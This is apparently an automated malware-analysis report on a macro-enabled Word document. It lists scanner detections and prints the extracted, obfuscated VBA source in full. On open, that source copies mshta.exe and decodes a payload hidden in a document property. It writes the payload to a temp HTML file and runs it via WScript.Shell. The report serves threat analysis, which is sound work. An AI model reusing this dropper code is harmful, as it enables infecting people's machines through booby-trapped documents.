Verdict: MALICIOUS
Risk Score: 138
Heuristics: 6
- ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): matched line in script: Call CreateObject("ws" + asFOSt + "ell").run(adteU)
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched line in script: Sub AutoOpen()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): matched line in script: aEcUJs = Environ(a6R0u)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every extracted URL in this sample carried the channel label "In document text (OOXML body / shared strings)".
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13503 bytes | 8f736866f4bb56092fa418ac66d9e308b277b3d194e00d6f6f81fd9400725e31 |
Preview script (macros.bas): first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "a7q8j"
Sub AutoOpen()
a9AjDY
End Sub
Attribute VB_Name = "apiXP"
Public Const a2t7A As String = ""
Public Const aIC82y As Integer = 19383 / 1491
Public Const aVklcx As String = "1ridn1iw1"
Public Const a7iRb As String = "231met1sys1"
Public Const aXY6eU As String = "p1m1e1t"
Public Const asFOSt As String = "cript.sh"
Function aVcl3()
' Metaphorical detection oftentimes itch
' Enliven pts
' Somewhat shorten wan liturgy
' Specifies personal but espionage
' Woodsman
' Sorted voyeurweb ranch arbitration
' Legend
' Authentication flickered ottawa
' Beginners overnight forswear rough
' Fermented
' Wicker groove
End Function
Sub aKfM0g(almk6y)
' Matthew sacred substantial incomplete
' Transcending melbourne retention
' Courtship liabilities sarcophagus bb negligent interventions
' Chimerical
' Mammal lie slime
' Venue vitriol venue
' Man-at-arms fry antenna redoubtable informed matins
' Examines vernacular
' Cassette damaged square agility
' Respiratory examined diagnostic serial musk
' Mysimon highly mechanic
' Uncertainty imprudent
' Bravo artist
' Karaoke hypnotism method loquacious felt
' Personals greens blackberry entangle users
' Polemical domestic explain uk
' Bludgeon
' Generous
' Moderator
' Drastic matt annie sometimes
' Seats
' Assessment reveals wit.
' Silicon dee surprise
' Invest neuter
' Rambling incomparable excluded tacks jacobus algorithm
' Tyson parliamentary democrat hoist
' Fustian dev pen
' Oneness fusion courtship originating garage
' Laughable tonic trapper troupe garcia
' Volvo debatable bridges saucy surreptitious principle disk
' Utah liturgy clark
' Companion abridged undermine easy
' Associating novelty
' Billow thin austria
' Electronics ag postman
' Theta ashley put
' Stationery n needs pique killing norway
' Balm pathology
' Spreading overhear workshop
' Ne owns rolls alumina
' Construct targets gazelle cars hygienic
' Suzuki bibliography urgently disconcerting nee diffuse sunday
' Postings paxil ja
' Screw knightly sedition
' Welch battery vedic combines retailers espn
' Hebrides consultant pissing kilometers bankruptcy
' Fisheries obituary
' Missed hitch intolerance
' Vat conduit rg tepee joe.
' Everybody smallest pure
' Disreputable compatible curves
' Norma bloodshot kathy investigation
' Weal dido brighton
' F roguish chi
' Intensity puppies
' Notoriety
End Sub
Function aMXBLS(aOGvmp)
' Oval
' Kennel seasoned which
' Suave drums oxfordshire pirates barricade
' Fume beginning acts circus fundamentally
' Weapon
' Shakira unshaven downloadable sepulchral ill.
' Holocaust dishes movement
' Armenian pp manoeuvre antiquary
' Retro wav panel overthrew
' Mulberry bigamy idioms
' Approximation delphi interventions nipple
' Colt
aMXBLS = ActiveDocument.BuiltInDocumentProperties(aOGvmp)
End Function
Public Sub ayF85A()
' Savings strictness sitting
' Remedial 404 verification curriculum hull
' Prediction optimist expatiate thereabouts
' Bleached qualification red
' Flooring deft l seeing sunless
' Entrails partnerships dejection tether mutable guaranteed
' Wrestling hits aristocrat semester arbitrator
' Kevin l
' Astronomy dandy lows viruses
' Award hamburg venal northwest
' Alaska publishing artificially sedge bavarian bang
aKc0Hd
End Sub
Public Sub a31Mm()
' Arcade objective partook equatorial ivory
aUvRm
End Sub
Attribute VB_Name = "an9mRQ"
Public Function af1zOU(aSbueH, aR53O)
' Clip rides effect gamecube
' Nh campus
' Pest occurred
' Monster peace illustrated armistice
' Mess odorous intonation conducive
' Immigration
' Convert mix silly
' Bemoan
' Warming urns domestic
' Rapt easterly chan liberated phalanx degenerate
' Paunch terrorism unwashed character
' Excess cord unkempt limitation giggling
' Re really plenty waste
' Closely presidency bellow
' Mushroom choir firewire
' Victorian jeer offset beeves
' Th eighty-four religious
' Authority loth usb
' Puppies
' Rawhide editions notre earthenware jury
' Copyist repulse else
' Computing applicants partial
' Maintains junk honeymoon affable operations
' Recommended feasibility tar wrapped
' Carb manually
' Measured
' Inverness
' Able ci fortify lottery argument threaded
' Fifty-six monday
' Nutmeg proven arthur empirical shock
' Mephistopheles extradition analyze
' Complaints nasty
' Upbringing blogging despite disagreed consumes
FileNumber = FreeFile
Open aSbueH For Output As #FileNumber
Print #FileNumber, aR53O
' Demi terrier
' Victorian fleet warm surpassing
' Inducing
' Crypt recorder rood stilts pungent bug raucous
' Cent manoeuvre elevate sensors
' Reservations reciprocate
' Keyboard op. estate almond
' Token
' Proven mother-of-pearl exponent sacramento
' Yards unrestrained thereby
' Samurai pigment birmingham
Close #FileNumber
End Function
Sub aFVAi(ai368F, aCkzj5)
' Ironic
' Victor
' Phantom americas
' Astrology newark tongue godless
' Detroit doer accosted
' Adown intrinsic sep society ark. chromatic
' Suspiciously remember been
' Seaport
' Emulate operation dying physician
' Intelligent scottish
' Expects ufo
' Leprosy def analogies
' Lake enterprises memorandum spiritual
FileCopy ai368F, aCkzj5
End Sub
Function aEnkW(aJ1blg)
' Compulsory wearer
' Existent improvident tan
' Cree pence satirical works skirted
' Minutes
' Endearment sharon chops
' Libs
' Troubleshooting directed aircraft ste. disquisition
' Tongue tassel nominee reasonably deviant
' Concord seq sardinian upturned collins
' Estimates programs equinox roger openings
' Simile
aEnkW = aJ1blg
End Function
Function aQlJP(aJ1blg) As String
Dim aL1TVh As Long
Dim avT1L As Integer
Dim azHgEW As Integer
For aL1TVh = 1 To Len(aJ1blg)
azHgEW = 0
' Condolence examined
a36L1 = Mid(aJ1blg, aL1TVh, 1)
avT1L = Asc(a36L1)
If (avT1L > anrNi2(-8664 + 8665) And avT1L < anrNi2(26836 / 13418)) Or (avT1L > anrNi2(9764 - 9761) And avT1L < anrNi2(-147 + 151)) Then
azHgEW = aIC82y
' Pugnacious tilt
' Cure assumed medusa
' Cuisine retarded reversal falter silky humdrum
' Boring co-operate
' Variables cultivates rm gangway cn
' Political boatswain blinking commissioners though
' Inexpensive integral cab concentric indicating
' Algeria patronize very exterminate lunch camping
' Gibraltar gp flyer
' Greenhouse allegation carrot
' Og crags
avT1L = aTEyJ6(avT1L, azHgEW)
If avT1L < anrNi2(5) And avT1L > 83 Then
avT1L = aAZOY3(avT1L)
ElseIf avT1L < 527 - 462 Then
avT1L = aAZOY3(avT1L)
End If
End If
' Cables cb intervention
' Orchestral
' Alias permissible
' Reggie ornamentation orpheus
' Creator hight staggers
' Lighter hard
' Induction washing
' Chunks iso meed texture
' Effie obtainable cbs glut
' Chemicals wi mister
aQrtNn = aHokFV(avT1L)
' Una
' Balustrade skylight
Mid$(aJ1blg, aL1TVh, 1) = aEnkW(aQrtNn)
Next aL1TVh
aQlJP = aJ1blg
End Function
Attribute VB_Name = "awLcX"
Function aW3Bc8(aBToD0)
' Yugoslavia hampshire elevate
' Addiction technician advanced
' Ven indicator missus amanda tardy
' Advertiser ordain
' Wince loc headgear tract truck knoll satyr
' Efficient refine tagged
' Tree push
' Qualities
' Coasting skiing cognizance
' Clandestinely venom swingers crochet
' Th
ad6sm = aBToD0
aIcfP = Len(ad6sm)
For avGrV = 0 To aIcfP - 1
' Polo palate intoxicating
' Aboriginal rutland
a4do1 = a4do1 & Mid(ad6sm, (aIcfP - avGrV), 1)
Next avGrV
aW3Bc8 = a4do1
End Function
Public Function aZQ0s(aFU5I)
aZQ0s = Replace(aFU5I, a2t7A, "")
End Function
Sub a9AjDY()
' Atheist lined hunts skating lobby malaria
' Aberration systematically ferrari slot reproductive buckle bulgaria abler
' Deluxe cowslip misdemeanor colleges subservient
' Sardinia dpi subscriber marmalade mega
' Halo arroyo radial decorum
' Rv plays equitable cons foster
' Advertise nugget
' Staple yew
' Nbc somber
' Craftsman genitive
' Bytes peacock combined tuition
' Highly romance vented urgently
' Service completion
' Reference currently
' Baseball cold perdition
' Resumes
' Americans referred lv yeast westerly
' Christians myanmar nuclear
' Rosette isolation
' Disable gangway
' Ilk quid
ayF85A
a31Mm
' Funereal loudness
' Gloves
' Necessarily hawser fealty smuggle exasperation
' Observed bryant phalanx seq
' Fresher appreciation
' Concerns beguiling drove mean prep lynching
' Declension hir presenting oxide betimes
' Ups unavoidable ghana rumble
' Practitioners bare economies
' Credibility parallel
Call CreateObject("ws" + asFOSt + "ell").run(adteU)
End Sub
Attribute VB_Name = "akKCQw"
Function aEcUJs(a6R0u)
' Misc
' Wiry
' Meteor obstruct marital timorous
' Conditional prate small startle writers
' Representations one-sided articulation squabble
' Pl chorus surrounded totals
' Adjunct unborn reason reseller engrossing obeisance
' Compress
' Jauntily antelope fiddler
' Mas smithy anthea meter
' Matting halter
aEcUJs = Environ(a6R0u)
End Function
Function a0lN7()
' Cowed responses nextel gad extraordinary
' Zurich nowhere
' Wicked hulk panasonic indisputable always
' Mode profession
' Prisoner
' Viands forsook parasite
' Poll boris strapping scouting
' Slough hydrogen primordial
' Whomsoever
' Attorneys flail chime
' Certified cvs fluffy dredge cameras
With Application
a0lN7 = .PathSeparator
End With
End Function
Function a6WwJq(aXnpG)
' Ado aviator ungenerous ailed
' Unctuous kind wesley
' Residential bewildering comparable howard latter
' Cycle
' Cajole
' Shemale cracker ranger searching
' Interloper buffer
' Neighbor assessments html
' Voip crispin mashed realistic penetration
' Souls partnerships
az6UMw = VBA.Split(aW3Bc8("lmth.ni|moc.ni|exe.athsm"), "|")
' Station gs
' Spin african
' Suzerainty recording surplus knoll you
' Hankering
' Department sedimentary
' Owned articulated vice
' Consist parent adorable
' Agents pdas umpire label nepal runner
' Declaration
' Estuary lightbox retribution admit petersburg leaking
' Wrongly wish perspicuity addicted
' Lexington equivalent wither
' Timorous pell-mell bald everything
' Flinching hr fran dissuade
' Poise
' Mpg hundredweight sensory
' Platinum copied fissure mailing
' Profligate whosoever evangelist
' Sanity halloween hacking impaired oe thus
' Flows biographical sheets augustinian ottawa metrical
' Harmonize unacceptable
' Superfluity felicitous arctic imaging
Select Case aXnpG
' Firemen
Case 0:
a6WwJq = aEcUJs(Replace(aW3Bc8(aVklcx), "1", "")) & a0lN7 & Replace(aW3Bc8(a7iRb), "1", "") & a0lN7 & az6UMw(0)
' Sepulchral mud airfare amidships crazy gotta oven
Case 1:
' Deputy
' Pall use spiral parks condos father
' Overdo
' Project movements
' Blasphemous dividend
' Windpipe describe easel
' Force citations collation discussed
' Killer pat cbs
' Covered outcast incipient california refresh
' Viking refuse waiver refraction truth
' Paths bring agree currencies argued
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & az6UMw(1)
Case 2:
' Bad
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & az6UMw(2)
End Select
End Function
Sub aUvRm()
aUJDm = aixC6O(a6WwJq(2))
af1zOU aUJDm, aQlJP(aMXBLS("category"))
End Sub
Attribute VB_Name = "ajXf4Y"
Function a4xYX(aJUOGB)
' Tendril featuring mongolia
' Sloped mama charles lie fuel
' Uplift rocked gold apex
' Ranks rooms
' Said tomatoes light example tunes inborn makeshift
' Mitigate
' Crown persona involve lees
' Plaid wainscot erotic
' Honest midlands uterus
' Juxtaposition po
' Contentious automobile routes
' Fawn maddening ya
' Conviction ply surprising rhea dishonor
' Pennon hewlett guest optimistic
' Usury
' Receptacle ofries waiting continually
' Stations supply
' Compact running rama
' Ham
' Installation births tulle brooks americanism
' Un conserve
a4xYX = (aZQ0s(aJUOGB))
End Function
Function a01mq(as8GS)
a01mq = (aZQ0s(as8GS))
End Function
Function aixC6O(al0z5m)
' Stilted potter
aixC6O = (aZQ0s(al0z5m))
End Function
Function adteU()
aJXCT8 = a01mq(a6WwJq(1))
abAhD = aixC6O(a6WwJq(2))
adteU = aJXCT8 & " " & abAhD
End Function
Attribute VB_Name = "aIN9wX"
Sub aKc0Hd()
aNBQ4 = a4xYX(a6WwJq(0))
aFqO2K = a01mq(a6WwJq(1))
aFVAi aNBQ4, aFqO2K
End Sub
Function aAZOY3(abXUhS)
aAZOY3 = abXUhS + 1273 - 1247
End Function
Function anrNi2(ah6FR)
If ah6FR = 0 Then
anrNi2 = 12587 / 12587
ElseIf ah6FR = 1 Then
anrNi2 = -243 + 307
ElseIf ah6FR = 2 Then
anrNi2 = 27573 / 303
ElseIf ah6FR = 3 Then
anrNi2 = -11 + 107
ElseIf ah6FR = 4 Then
anrNi2 = 11193 / 91
ElseIf ah6FR = 5 Then
anrNi2 = 297 - 200
Else
anrNi2 = 1027 - 3
End If
End Function
Function aTEyJ6(abXUhS, aYTad)
aTEyJ6 = abXUhS - aYTad
End Function
Function aHokFV(abXUhS)
aHokFV = VBA.ChrW(abXUhS)
' Cottage magical tortoise hire
' Sectors order honey dosage
' Stampede
' Mains acquisition arbitrator maneuver coating navigator robust woo
' Unexpected crochet whilst
' Turbo
' Premeditation proboscis furniture
' Overview gravity
' Carp jaunt forty-three
' Appliance heat component powell all-powerful
' Disciplines clinical bloodthirsty
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 53248 bytes | 5a0131e7445b6e0f35b55c29cf9db93262f95f198fd1bd41ea90f8a73afeb540 |